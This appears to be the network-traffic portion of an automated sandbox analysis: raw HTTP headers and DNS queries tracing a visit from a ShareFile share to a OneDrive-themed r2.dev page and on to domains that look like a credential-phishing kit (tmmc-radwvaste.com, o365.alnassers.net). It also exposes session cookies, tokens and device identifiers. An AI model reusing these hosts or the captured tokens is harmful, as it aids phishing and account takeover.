Source: global trafficHTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -300X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=300; StandardBias=0; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAQvWDRakrhd1CVvbAbYUoQ0bJK56J/DPM52CY4RG1tj308eP/qH9jJdqZsPWx6O2Zi%2BRdCDf2PZS/C9maH5WDqaxalys15BpBXQfVwS3eMS89KVOKxm6okhC9UsvrEyTgvM9YxBtT0frstknvus7iVMMAeFfuoeZNaLXylTnSS7IUpbvcQW7ptUjYU3RCrstEUoIBDqtkNl6clWDPkT6eURhHkbL71sdoXgirct5KkUaUl4lPh/hPkCOu7XYr35W2FRtiidDx/yksNlWCEzh45Em8WkN%2BVJYLnq%2BVsHlvC%2BtbI8ybPe5D85SvRR4wNgX8Anx7Lc/aKm6Fo3Q/38wsyYQZgAAEIIFmC8vjPZBkUEmTTGF2HiwAQ3WPkzrsH4UH47NF%2Bi4eS6MkrZ9Geb7NtEgq4y3Qw06J2%2B69rFbaUbN9vRGI9yZGxJDyIkaXFyYXtccbFKNJTXgtmG6wDDPrsEkUyIxr9u%2BHCrBfqq/2CkgvVXRPNJIKGA5%2B/XtGo6J7YcDtUASiH40mf99THTXgj1vC2cE10wm11eV/7Jl3riICPDR6otPhahocjO2KXLpboiADdYj3Abo7aK7gCVCMfT%2Bx0ciF2%2BQn15pSrLaTQ9Hg15op/8bM6YtXj7TNTDZZXd5WBLGcMP08mzFEn7ZZxdYk10pos5o64VnGb98mQ0HTAxT0C9U9%2BelVbrwMsI4VWS9V047hNGrQjPpcrUFyNRvt6K%2B2Wt9iEi4nnpRb8YASbK0Pjm8kWFtNPHsgFY9si%2BzLt1J/9hF/Pmsa3YEfzvPqtQJSHdpwGzKR94HH%2Bdk3QSIcGmg2fyXz/xcwu9j1LXy7w/jNU4F4Jru6aiefdc7VG7eIl7u8ZMIgpM/oaKiQ3BXTeksA8YdiR0418b%2BC7pn1NNCUQwPav3zITxdVFjoGmnmVSjQJOhVMQOyQhBoAlPYdWLmgdoB%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1730835411User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: B56F0D66F7C3474A83334DCA54B4A4FEX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global trafficHTTP traffic detected: GET /bundles/2bd6acf87747a8fbd76a.gif HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=Iri+/rzL7SHzOd1k2VFXtwKZ3mVBfrOElLkm6CWpRxf1nBc8dKYkpasNaiT1zucnpZ5pAQIMGU9LpIDHXvsmxOe+4HxxiwkHBxXzC6zxH8I5EyumAs6b+r9QfbPJ5Q91S+cTzAf5apuNduPOe2xy7FaXuDklnaALt+w6axJCscDVYoHWA6cqvevcuoM6O2eK4po3/KFBHTXRn8HWQcLL8+nzMr2mXjEP279dKg+Hu6zMK6f4vPMsE+0XLxisDYNV; AWSALBTGCORS=Iri+/rzL7SHzOd1k2VFXtwKZ3mVBfrOElLkm6CWpRxf1nBc8dKYkpasNaiT1zucnpZ5pAQIMGU9LpIDHXvsmxOe+4HxxiwkHBxXzC6zxH8I5EyumAs6b+r9QfbPJ5Q91S+cTzAf5apuNduPOe2xy7FaXuDklnaALt+w6axJCscDVYoHWA6cqvevcuoM6O2eK4po3/KFBHTXRn8HWQcLL8+nzMr2mXjEP279dKg+Hu6zMK6f4vPMsE+0XLxisDYNV; AWSALB=ywpF69d9RVl4OtQdV5gu/DDeSivy7ld8NoYrkKPaONEgm3XjZdP1U6U+XQfbuxN03iuY3Qm2oNQ2K8y2znIyp3/d3kggB3nRIEVENxTftQJVMx4BEHHUCyudVp2y; AWSALBCORS=ywpF69d9RVl4OtQdV5gu/DDeSivy7ld8NoYrkKPaONEgm3XjZdP1U6U+XQfbuxN03iuY3Qm2oNQ2K8y2znIyp3/d3kggB3nRIEVENxTftQJVMx4BEHHUCyudVp2y
Source: global trafficHTTP traffic detected: GET /bundles/2bd6acf87747a8fbd76a.gif HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=t3jHKkjxPfE1sMmD+iQ+UBL/K/5qNmBA/xlOmAaqlEToB9haG5dRxNPscIU8Q6IoySlsloZXeNrh6pauA3bMFNQWwZSpKSPOOZehSK2KefbU7cPc+D0aRC7Bkkw+FAs+fHvJ41Kj7oqg1QFQnBI4YCqOz/tCf5mo4dCKa2irCMja9ccKWRLmeEuyQ6W+XU46JbpQUbtj3TODBFuLpBwdVR+8WtyK/oz2yzvIrNQm255baCNBxVhu5MjU918Ws8GU; AWSALBTGCORS=t3jHKkjxPfE1sMmD+iQ+UBL/K/5qNmBA/xlOmAaqlEToB9haG5dRxNPscIU8Q6IoySlsloZXeNrh6pauA3bMFNQWwZSpKSPOOZehSK2KefbU7cPc+D0aRC7Bkkw+FAs+fHvJ41Kj7oqg1QFQnBI4YCqOz/tCf5mo4dCKa2irCMja9ccKWRLmeEuyQ6W+XU46JbpQUbtj3TODBFuLpBwdVR+8WtyK/oz2yzvIrNQm255baCNBxVhu5MjU918Ws8GU; AWSALB=2tCYHQS5uGX3Gibq0ZC9d6eyNaghG8Xv5I+FpxP0CHbfny15WlUSwocV5b0mNruTQ5OHLqpd08i9EHwqKYLicN24bZZBUVmsvms7rDoKONiRw03bLFNzNMDPdqKp; AWSALBCORS=2tCYHQS5uGX3Gibq0ZC9d6eyNaghG8Xv5I+FpxP0CHbfny15WlUSwocV5b0mNruTQ5OHLqpd08i9EHwqKYLicN24bZZBUVmsvms7rDoKONiRw03bLFNzNMDPdqKp
Source: global trafficHTTP traffic detected: GET /0nedrivedoc.html HTTP/1.1Host: pub-10305130932840cc9846324aa165bbf7.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-10305130932840cc9846324aa165bbf7.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: botCheck=1
Source: global trafficHTTP traffic detected: GET /200/ HTTP/1.1Host: tmmc-radwvaste.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tmmc-radwvaste.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tmmc-radwvaste.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: o365.alnassers.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tmmc-radwvaste.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://tmmc-radwvaste.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://tmmc-radwvaste.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /events/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=71159&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0 HTTP/1.1Host: bam.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=e768e1339f16edbe
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCNy9zQEIkcrNAQi5ys0BCLbLzQEI6dLNAQiK080BCMHUzQEIz9bNAQjj1s0BCI7XzQEIp9jNAQi62M0BCPnA1BUYuL/NARj2yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jserrors/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=90998&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0 HTTP/1.1Host: bam.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=e768e1339f16edbe
Source: global trafficHTTP traffic detected: GET /events/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=91000&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0 HTTP/1.1Host: bam.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=e768e1339f16edbe
Source: global trafficDNS traffic detected: DNS query: averellharriman.sharefile.com
Source: global trafficDNS traffic detected: DNS query: 0093b71e39a6.us-east-1.sdk.awswaf.com
Source: global trafficDNS traffic detected: DNS query: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: app.launchdarkly.com
Source: global trafficDNS traffic detected: DNS query: averellharriman.sf-api.com
Source: global trafficDNS traffic detected: DNS query: citrix-sharefile-content.customer.pendo.io
Source: global trafficDNS traffic detected: DNS query: piletfeed-cdn.sharefile.io
Source: global trafficDNS traffic detected: DNS query: o49063.ingest.sentry.io
Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: js-agent.newrelic.com
Source: global trafficDNS traffic detected: DNS query: events.launchdarkly.com
Source: global trafficDNS traffic detected: DNS query: bam.nr-data.net
Source: global trafficDNS traffic detected: DNS query: citrix-sharefile-data.customer.pendo.io
Source: global trafficDNS traffic detected: DNS query: sf-cv.sharefile.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: sf-renderx-us-east-1.sharefile.com
Source: global trafficDNS traffic detected: DNS query: sf-temp-us-east-1-production.s3.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: pub-10305130932840cc9846324aa165bbf7.r2.dev
Source: global trafficDNS traffic detected: DNS query: tmmc-radwvaste.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: o365.alnassers.net
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: unknownHTTP traffic detected: POST /0093b71e39a6/478ed03bbf12/verify HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveContent-Length: 8703sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Nov 2024 19:36:33 GMTContent-Length: 0Connection: closeSet-Cookie: AWSALBTG=0dB5Y+Th7WKsXTDjvr/yxhXL//OmjpQTw60MO4z37DlhX/ivAuhD8Gm0nhKUTFuL3u7bBvIHqqEMrV+u1V8tty83G3Mz/h5UXNqIZblCD5LA7GcEcZ5Cy4LXNgbD8dbgdVq4qoUGYZu7gn5EIZhO47poakmzNMVHx9Gk1oZE8DkU+IODSYs2Rn/QvHPFvoWJEpZeUzsITMS7kflajWSbeIC1UJMMzxxelLdrg+F2qcnqnFlVki9S1BnMnF1g4n79; Expires=Tue, 12 Nov 2024 19:36:33 GMT; Path=/Set-Cookie: AWSALBTGCORS=0dB5Y+Th7WKsXTDjvr/yxhXL//OmjpQTw60MO4z37DlhX/ivAuhD8Gm0nhKUTFuL3u7bBvIHqqEMrV+u1V8tty83G3Mz/h5UXNqIZblCD5LA7GcEcZ5Cy4LXNgbD8dbgdVq4qoUGYZu7gn5EIZhO47poakmzNMVHx9Gk1oZE8DkU+IODSYs2Rn/QvHPFvoWJEpZeUzsITMS7kflajWSbeIC1UJMMzxxelLdrg+F2qcnqnFlVki9S1BnMnF1g4n79; Expires=Tue, 12 Nov 2024 19:36:33 GMT; Path=/; SameSite=None; SecureSet-Cookie: AWSALB=TafDt1fvVrlBCSuFiTLhl/spLq+n7xw7c771/F/dqieG730uhdEu5h2nFee8B/gJyXq8CcZH5xYQqyVoaGxpBmBVlaC3QM5jR+pB+1ZLtvKDpdraGyrwpfsl3uJ4; Expires=Tue, 12 Nov 2024 19:36:33 GMT; Path=/Set-Cookie: AWSALBCORS=TafDt1fvVrlBCSuFiTLhl/spLq+n7xw7c771/F/dqieG730uhdEu5h2nFee8B/gJyXq8CcZH5xYQqyVoaGxpBmBVlaC3QM5jR+pB+1ZLtvKDpdraGyrwpfsl3uJ4; Expires=Tue, 12 Nov 2024 19:36:33 GMT; Path=/; SameSite=None; SecureCache-Control: no-store, must-revalidate, no-cache, privateContent-Language: enExpires: 0Pragma: no-cacheX-XSS-Protection: 1;mode=blockReferrer-Policy: same-originX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=16000000;includeSubDomains;preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 19:36:36 GMTContent-Type: application/json; charset=utf-8Content-Length: 93Connection: closeSet-Cookie: AWSALBTG=+IauWyoLRxalI0A/4CE0PsAOHdH9w4f9e4q+I7ArxmyfaKJ23VcCQpBZ8bmFXmPf3J/fOeUwnk31bAKSVDW/KsyEyfA7S5Gx1dDOF9fahAsoS8/f8fXWySp+m2uHsx7uJRobI+SvaVda9HUVjZSLDK/jQcDEBDqhg60E78DMxgOC; Expires=Tue, 12 Nov 2024 19:36:36 GMT; Path=/Set-Cookie: AWSALBTGCORS=+IauWyoLRxalI0A/4CE0PsAOHdH9w4f9e4q+I7ArxmyfaKJ23VcCQpBZ8bmFXmPf3J/fOeUwnk31bAKSVDW/KsyEyfA7S5Gx1dDOF9fahAsoS8/f8fXWySp+m2uHsx7uJRobI+SvaVda9HUVjZSLDK/jQcDEBDqhg60E78DMxgOC; Expires=Tue, 12 Nov 2024 19:36:36 GMT; Path=/; SameSite=None; SecureSet-Cookie: AWSALB=5K2xCKytgEDrXf19O8KSAaZNUTy7Fo9dPKEtzw6IUqCQxmx0dlfRFqC13o6jE/hi1OUA44lAcZMNqt26gGjiTu5Rj85HouldaNkriaQuNEam4p98l40MhfqSA824; Expires=Tue, 12 Nov 2024 19:36:36 GMT; Path=/Set-Cookie: AWSALBCORS=5K2xCKytgEDrXf19O8KSAaZNUTy7Fo9dPKEtzw6IUqCQxmx0dlfRFqC13o6jE/hi1OUA44lAcZMNqt26gGjiTu5Rj85HouldaNkriaQuNEam4p98l40MhfqSA824; Expires=Tue, 12 Nov 2024 19:36:36 GMT; Path=/; SameSite=None; SecureCache-Control: no-store, no-cacheContent-Language: enExpires: Mon, 04 Nov 2024 19:36:36 GMTCitrix-TransactionId: 88e38c9a-4a41-4ce9-b667-dc5fa1aa0f5fCorrelationId: AfMisf1HfkK1791YUrt1FwX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Robots-Tag: noindexX-SFAPI-AccountId: a2686d04-5eab-df7f-5602-cc391d4b2e38X-SFAPI-OAuthClientId: X-SFAPI-AppCode: _NoneX-SFAPI-RequestID: tMdhEQQy4kOvgtt26xqztQ
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Nov 2024 19:36:38 GMTContent-Type: application/json; charset=utf-8Content-Length: 143Connection: closeSet-Cookie: AWSALBTG=49IfGhJNkrWT5dv87Y+JldFscw+OWtJmSGiiy8QXBDokGqNvOxER99+dj8Nq67h/XywED1P/3TpPjKIjlWnxgJUmBhwf/ARg5K+Ll1pCcAbotOAfgl5+5H7M15eb88QiAj4lwbGC2fQpfFjgEGDPQun+EKKupDN6psFBr099OCBN; Expires=Tue, 12 Nov 2024 19:36:38 GMT; Path=/Set-Cookie: AWSALBTGCORS=49IfGhJNkrWT5dv87Y+JldFscw+OWtJmSGiiy8QXBDokGqNvOxER99+dj8Nq67h/XywED1P/3TpPjKIjlWnxgJUmBhwf/ARg5K+Ll1pCcAbotOAfgl5+5H7M15eb88QiAj4lwbGC2fQpfFjgEGDPQun+EKKupDN6psFBr099OCBN; Expires=Tue, 12 Nov 2024 19:36:38 GMT; Path=/; SameSite=None; SecureSet-Cookie: AWSALB=qXJMuLx94lnvm8w4rQ2QSOrlDu1N1Or/jwryHI5WA6ot/T5l2c6r0jXUtKi2CCVUZiDcCNldmYJaopi+REKaYLyNSrT593xbCJJ7nTwbI7L7fj8m0GIyw/eYN6xU; Expires=Tue, 12 Nov 2024 19:36:38 GMT; Path=/Set-Cookie: AWSALBCORS=qXJMuLx94lnvm8w4rQ2QSOrlDu1N1Or/jwryHI5WA6ot/T5l2c6r0jXUtKi2CCVUZiDcCNldmYJaopi+REKaYLyNSrT593xbCJJ7nTwbI7L7fj8m0GIyw/eYN6xU; Expires=Tue, 12 Nov 2024 19:36:38 GMT; Path=/; SameSite=None; SecureCache-Control: no-cache,no-storeExpires: -1Pragma: no-cacheX-SFAPI-AccountId: a2686d04-5eab-df7f-5602-cc391d4b2e38X-SFAPI-OAuthClientId: X-SFAPI-AppCode: _NoneX-SFAPI-RequestID: UIeLh0fsqkeR3finnWfA4g
